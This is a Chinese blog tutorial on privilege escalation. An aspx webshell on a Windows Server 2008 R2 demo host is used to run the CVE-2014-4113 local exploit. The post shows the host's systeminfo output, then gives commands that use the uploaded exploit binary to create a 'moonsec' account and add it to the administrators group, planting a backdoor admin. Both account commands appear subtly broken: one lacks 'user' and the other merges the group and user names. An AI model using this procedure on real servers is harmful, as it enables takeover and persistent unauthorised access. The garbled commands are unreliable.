提权教程:winserver2008R2溢出提权

Admin 2020-07-07 74人围观 ,发现0个评论 提权教程

1、简介


在winserver2008 r2 中 服务器默认是支持aspx的。所以默认都是可以执行一些命令。

如果没有进行补丁修复可以利用一些溢出提权工具,进行提权。


2、CVE-2014-4113-Exploit


这个版本的提权工具 可以对winserver2008 的系统进行溢出提权

 

3、实战

 

http://www.demo1.com/asp.aspx

 

提权教程:winserver2008R2溢出提权 Web安全 第1张


systeminfo 这个命令查看系统信息的

主机名:          WIN-HRKJ54V1GSJ

OS 名称:         Microsoft Windows Web Server 2008 R2

OS 版本:         6.1.7601 Service Pack 1 Build 7601

OS 制造商:        MicrosoftCorporation

OS 配置:          独立服务器

OS 构件类型:     Multiprocessor Free

注册的所有人:    Windows 用户

注册的组织:      

产品 ID:         00500-001-0000635-84743

初始安装日期:    2019/3/3, 16:24:34

系统启动时间:    2019/4/7, 17:14:40

系统制造商:      VMware, Inc.

系统型号:        VMware7,1

系统类型:        x64-based PC

处理器:          安装了 2 个处理器。

                  [01]: Intel64 Family 6 Model94 Stepping 3 GenuineIntel ~3408 Mhz

                  [02]: Intel64 Family 6 Model94 Stepping 3 GenuineIntel ~3408 Mhz

BIOS 版本:        VMware, Inc.VMW71.00V.6997262.B64.1710270607, 2017/10/27

Windows 目录:     C:\Windows

系统目录:        C:\Windows\system32

启动设备:        \Device\HarddiskVolume1

系统区域设置:    zh-cn;中文(中国)

输入法区域设置:  zh-cn;中文(中国)

时区:            (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐

物理内存总量:    4,095 MB

可用的物理内存:  2,939 MB

虚拟内存: 最大值: 8,188 MB

虚拟内存: 可用:   6,603 MB

虚拟内存: 使用中: 1,585 MB

页面文件位置:    C:\pagefile.sys

域:               WORKGROUP

登录服务器:      暂缺

修补程序:        安装了 2 个修补程序。

                  [01]: KB2999226

                  [02]: KB976902

网卡:            安装了 1 个 NIC。

                  [01]: Intel(R) 82574L GigabitNetwork Connection

                      连接名:      本地连接

                      启用 DHCP:   否

                      IP 地址

                        [01]: 192.168.0.105

                        [02]:fe80::986d:3564:19ad:2447

 

溢出成功

 提权教程:winserver2008R2溢出提权 Web安全 第2张

如果找不到可写目录 可以 使用遍历可写目录的脚本进行查找

 提权教程:winserver2008R2溢出提权 Web安全 第3张

增加用户

/c C:\inetpub\wwwroot\www.demo1.com\Win64.exe "net moonsec moonsec /add"


增加到用户组

/c C:\inetpub\wwwroot\www.demo1.com\Win64.exe "net localgroup administratorsmoonsec /add"

 提权教程:winserver2008R2溢出提权 Web安全 第4张

请发表您的评论
请关注微信公众号
微信二维码
不容错过
Powered By 蚁人博客